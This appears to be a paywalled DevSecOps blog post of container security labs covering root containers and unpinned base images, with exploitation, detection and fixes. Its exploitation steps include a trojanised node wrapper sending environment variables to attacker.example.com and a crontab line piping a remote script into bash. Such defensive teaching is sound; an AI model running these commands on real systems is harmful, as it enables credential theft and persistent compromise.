DevSecOps Guides

DevSecOps Guides

Container Security Labs in 2026

Container Vulnerabilities and Security Misconfiguration with exploitation and mitigation techniques.

Reza's avatar
Reza
Feb 27, 2026
∙ Paid

Another weak, another article, another knowledge sharing.

We put together 42 container security labs that cover the most common misconfigurations in Docker and Kubernetes environments. Each lab walks through a real vulnerable configuration, shows the step-by-step exploitation path, explains the root cause, and provides a working fix with verification commands.

The labs cover Docker image hardening, runtime security, Kubernetes pod and cluster security, RBAC, network policies, secrets management, container registries, CI/CD pipeline security, and supply chain integrity. Every example uses real Dockerfiles, Kubernetes YAML manifests, and commands you can run against your own environments.

This is a hands-on reference built for penetration testers, security engineers, and platform teams. We show the vulnerable configuration, walk through exactly how an attacker exploits it, and give you the detection and remediation steps.


Running Containers as Root

By default, Docker containers run processes as root (UID 0). This means if an attacker escapes the container or exploits a vulnerability in the application, they gain root-level access to the container filesystem and potentially the host. In Kubernetes and Docker alike, this is the single most common misconfiguration we encounter during assessments.

The impact is straightforward: a web application vulnerability that would normally give an attacker limited shell access instead gives them full control. They can install packages, modify system files, read shadow, and in worst-case scenarios with additional misconfigurations, pivot to the host. CVE-2019-5736 demonstrated how a root process inside a container could overwrite the host runc binary and gain host-level code execution. The Tesla cryptojacking incident in 2018 also involved containers running as root with exposed dashboards.

Running as non-root is a baseline control. Every container image should define a non-root user, and every deployment should enforce it.

Root Cause Analysis

When a Dockerfile has no USER directive, the default user is root. Many official base images ship without a non-root user configured, so unless the image author explicitly creates one, every process in the container inherits UID 0. Developers often skip this step because their application “works” as root during local testing, and nothing in the default Docker configuration warns them.

Vulnerable Configuration

FROM node:20-slim

WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
COPY . .

EXPOSE 3000
CMD ["node", "server.js"]

This container runs node server.js as root. Verify with:

docker build -t myapp-vuln .
docker run --rm myapp-vuln whoami
# Output: root
docker run --rm myapp-vuln id
# Output: uid=0(root) gid=0(root) groups=0(root)

Exploitation

We start from a position where we have RCE inside the running container (via an application vulnerability such as SSRF, command injection, or deserialization).

Step 1: Confirm root access

docker run --rm -it myapp-vuln sh
id

Expected output:

uid=0(root) gid=0(root) groups=0(root)

Step 2: Read sensitive system files

cat shadow

Expected output:

root:*:19770:0:99999:7:::
daemon:*:19770:0:99999:7:::
bin:*:19770:0:99999:7:::
...

As root, we can read password hashes on any container that stores local users.

Step 3: Install backdoor packages

apt-get update && apt-get install -y nmap netcat-openbsd socat

Expected output:

Reading package lists... Done
Setting up nmap (7.93+dfsg1-1) ...
Setting up netcat-openbsd (1.219-1) ...

As root, package installation succeeds. A non-root user would get permission denied.

Step 4: Modify application binaries

cp /usr/local/bin/node /usr/local/bin/node.orig
cat > /usr/local/bin/node << 'EOF'
#!/bin/bash
curl -s http://attacker.example.com/exfil -d "$(env)" >/dev/null 2>&1 &
exec /usr/local/bin/node.orig "$@"
EOF
chmod +x /usr/local/bin/node

Every future invocation of node now exfiltrates environment variables.

Step 5: Write cron persistence

echo '* * * * * root curl http://attacker.example.com/shell.sh | bash' >> /etc/crontab

Step 6: CVE-2019-5736 attack vector (runc overwrite)

This CVE allows a root process inside a container to overwrite the host runc binary. The attack works by:

# Inside the container as root
# Overwrite /proc/self/exe (which points to runc during exec)
# This is the simplified concept -- the actual exploit uses a specially crafted binary
cp /proc/self/exe /tmp/runc-backup
cat > /tmp/payload.sh << 'EOF'
#!/bin/bash
# This payload executes on the HOST after runc is overwritten
cat shadow > /tmp/host-shadow
EOF

The full exploit (CVE-2019-5736) requires runc versions < 1.0-rc6. Running as non-root blocks this attack entirely because the process lacks permission to overwrite the runc binary via /proc/self/exe.

Detection

Hadolint (Dockerfile linting)

hadolint Dockerfile

Expected output:

Dockerfile:8 DL3002 warning: Last USER should not be root

Hadolint rule DL3002 fires when the final USER in a Dockerfile is root or when no USER directive exists.

Dockle (image linting)

dockle myapp-vuln

Expected output:

WARN  - CIS-4.1  : Create a user for the container
      - Last user should not be root

Docker inspect at runtime

docker inspect --format '{{.Config.User}}' myapp-vuln

Expected output (empty means root):


An empty string confirms no user is set, meaning the container runs as root.

Check running containers

docker ps -q | xargs -I{} docker inspect --format '{{.Name}} -> User: {{.Config.User}}' {}

This lists every running container and its configured user. Any blank entry runs as root.

Solution

Create a dedicated user in the Dockerfile and switch to it before the CMD instruction. For runtime enforcement, use the --user flag or user: directive in Compose.

Fixed Configuration

FROM node:20-slim

RUN groupadd --gid 1001 appgroup && \
    useradd --uid 1001 --gid appgroup --shell /bin/false --create-home appuser

WORKDIR /app
COPY --chown=appuser:appgroup package*.json ./
RUN npm ci --only=production
COPY --chown=appuser:appgroup . .

USER appuser

EXPOSE 3000
CMD ["node", "server.js"]

Runtime enforcement via docker run:

docker run --rm --user 1001:1001 myapp whoami
# Output: appuser

Runtime enforcement via docker-compose.yml:

services:
  app:
    image: myapp
    user: "1001:1001"
    security_opt:
      - no-new-privileges:true

The USER directive sets the default user for all subsequent RUN, CMD, and ENTRYPOINT instructions. The --chown flag on COPY ensures files are owned by the non-root user so the application can still read them. The runtime --user flag acts as a second layer of defense regardless of what the Dockerfile specifies.

Verification

Verify the rebuilt image runs as non-root

docker build -t myapp-fixed .
docker run --rm myapp-fixed id

Expected output:

uid=1001(appuser) gid=1001(appgroup) groups=1001(appgroup)

Verify with docker inspect

docker inspect --format '{{.Config.User}}' myapp-fixed

Expected output:

appuser

Verify root operations are denied

docker run --rm myapp-fixed apt-get update

Expected output:

Reading package lists... Done
E: Could not open lock file /var/lib/apt/lists/lock - open (13: Permission denied)

Verify shadow is unreadable

docker run --rm myapp-fixed cat shadow

Expected output:

cat: shadow: Permission denied

Verify hadolint passes

hadolint Dockerfile

Expected output: no warnings about root user.


Using Unversioned or Latest Base Images

Using latest or untagged base images means every build can pull a different underlying image. Today your FROM node:latest resolves to Node 20.11.0 on Debian Bookworm. Tomorrow it might resolve to Node 22 on a different base OS. You have no control and no reproducibility. This is a supply chain risk.

The real-world impact goes beyond broken builds. An attacker who compromises an upstream image tag can inject malicious code into every downstream build that pulls that tag. The event-stream incident and the Codecov bash uploader compromise both demonstrated how supply chain attacks propagate through mutable references. The ua-parser-js npm hijack in 2021 similarly showed how a single compromised dependency can cascade to millions of users. With Docker images, the attack surface is the entire operating system and runtime.

Pinning to a digest (SHA256 hash) guarantees you pull the exact image bytes you tested. Tags are mutable pointers; digests are immutable content addresses.

Root Cause Analysis

Docker tags are mutable. A registry maintainer can push a new image to the same tag at any time, and docker pull will fetch the latest version associated with that tag. The latest tag is just a convention -- it has no special behavior other than being the default when no tag is specified. Even pinning to node:20.11.0 is not fully deterministic because a maintainer can overwrite that tag. Only the image digest is immutable.

Vulnerable Configuration

FROM node

WORKDIR /app
COPY . .
RUN npm ci
CMD ["node", "index.js"]

Or with the explicit latest tag, which is identical behavior:

FROM node:latest

WORKDIR /app
COPY . .
RUN npm ci
CMD ["node", "index.js"]

Check what you actually pulled:

docker pull node:latest
docker inspect node:latest | jq -r '.[0].RepoDigests'
# The digest changes every time the upstream pushes a new image

Exploitation

This attack demonstrates how mutable tags allow silent supply chain compromise.

Step 1: Show current digest for latest tag

docker pull node:latest
docker inspect --format='{{index .RepoDigests 0}}' node:latest

Expected output:

node@sha256:a1b2c3d4e5f6... (some digest)

Step 2: Wait and pull again to show tag mutability

# Remove local cache
docker rmi node:latest

# Pull again (after upstream publishes new image)
docker pull node:latest
docker inspect --format='{{index .RepoDigests 0}}' node:latest

The digest will differ if the upstream has pushed an update. The tag latest now points to entirely different image contents.

Step 3: Use crane to inspect tag mutability without pulling

# Install crane: https://github.com/google/go-containerregistry/releases
crane digest node:latest

Expected output:

sha256:7f3a8e... (current digest)

Run this a week later and the digest changes. The tag is a moving target.

Step 4: Compare what two developers actually built

# Developer A built the image last week
docker build -t myapp:dev-a .
docker inspect --format='{{index .RootFS.Layers}}' myapp:dev-a | wc -w
# 8 layers

# Developer B builds today after upstream update
docker build --no-cache -t myapp:dev-b .
docker inspect --format='{{index .RootFS.Layers}}' myapp:dev-b | wc -w
# 9 layers -- different base, different OS packages, different vulnerabilities

Step 5: Show different vulnerability surfaces

trivy image myapp:dev-a --severity HIGH,CRITICAL --quiet
# Total: 12 (HIGH: 9, CRITICAL: 3)

trivy image myapp:dev-b --severity HIGH,CRITICAL --quiet
# Total: 27 (HIGH: 21, CRITICAL: 6)
# Completely different CVE set because the base OS changed

The same Dockerfile produces images with different vulnerability profiles on different days. Production is running a version nobody tested.

Step 6: Demonstrate a poisoned tag scenario

# An attacker pushes a malicious image to a public registry under a typosquatted name
# e.g., "nodje" instead of "node"
# FROM nodje:latest  <-- developer typo pulls attacker-controlled image

# Even on legitimate registries, a compromised maintainer account can push to existing tags
crane manifest node:20-slim | jq '.config.digest'
# This digest is what you trust. Without pinning, you trust whatever the tag resolves to.

Detection

Hadolint (Dockerfile linting)

hadolint Dockerfile

Expected output:

Dockerfile:1 DL3007 warning: Using latest is not allowed

Rule DL3007 fires on FROM image:latest or FROM image (implicit latest).

Hadolint with pinning rules

hadolint --strict Dockerfile

Expected output:

Dockerfile:1 DL3006 warning: Always tag the version of an image explicitly
Dockerfile:1 DL3007 warning: Using latest is not allowed

Trivy (scan for known CVEs in unpinned image)

trivy image node:latest --severity CRITICAL

Expected output:

node:latest (debian 12.4)
===========================
Total: 14 (CRITICAL: 14)

┌──────────────────┬────────────────┬──────────┐
│     Library      │ Vulnerability  │ Severity │
├──────────────────┼────────────────┼──────────┤
│ libssl3          │ CVE-2024-XXXXX │ CRITICAL │
│ ...              │ ...            │ ...      │
└──────────────────┴────────────────┴──────────┘

Docker Scout

docker scout cves node:latest --only-severity critical,high

Check existing images for digest pinning

# Grep Dockerfiles in your repo for unpinned bases
grep -rn "^FROM " */Dockerfile | grep -v "@sha256:"

This lists every Dockerfile that does not pin to a digest.

Solution

Pin base images to a specific version tag and, for production workloads, pin to the image digest. Use docker pull to get the digest of a known-good image and reference it directly.

Fixed Configuration

Good -- pinned to version tag:

FROM node:20.11.0-slim

WORKDIR /app
COPY . .
RUN npm ci --only=production
CMD ["node", "index.js"]

Better -- pinned to digest:

FROM node:20.11.0-slim@sha256:bf0ef0687ffbd6c7a4a49e3e4a1e00e8e0d8f3a2e24c0b1c3cb27e3f6c8a0f1

WORKDIR /app
COPY . .
RUN npm ci --only=production
CMD ["node", "index.js"]

Get the digest of your current image:

docker inspect --format='{{index .RepoDigests 0}}' node:20.11.0-slim

Or with crane:

crane digest node:20.11.0-slim

Verification

Confirm digest is pinned in Dockerfile

grep "^FROM" Dockerfile

Expected output:

FROM node:20.11.0-slim@sha256:bf0ef0687ffbd6c7a4a49e3e4a1e00e8e0d8f3a2e24c0b1c3cb27e3f6c8a0f1

Confirm hadolint no longer warns

hadolint Dockerfile

Expected output: no DL3006 or DL3007 warnings.

Confirm reproducibility

docker build -t myapp:build1 .
docker build --no-cache -t myapp:build2 .
diff <(docker inspect myapp:build1 | jq '.[0].RootFS') \
     <(docker inspect myapp:build2 | jq '.[0].RootFS')

Expected output: no diff. Both builds produce identical base layers because the digest is pinned.

Verify with crane that digest matches

crane digest node:20.11.0-slim
# Compare this against the digest in your Dockerfile -- they should match


Secrets Exposed via ENV and ARG in Dockerfiles

User's avatar

Continue reading this post for free, courtesy of Reza.

Or purchase a paid subscription.
© 2026 Reza · Privacy ∙ Terms ∙ Collection notice
Start your SubstackGet the app
Substack is the home for great culture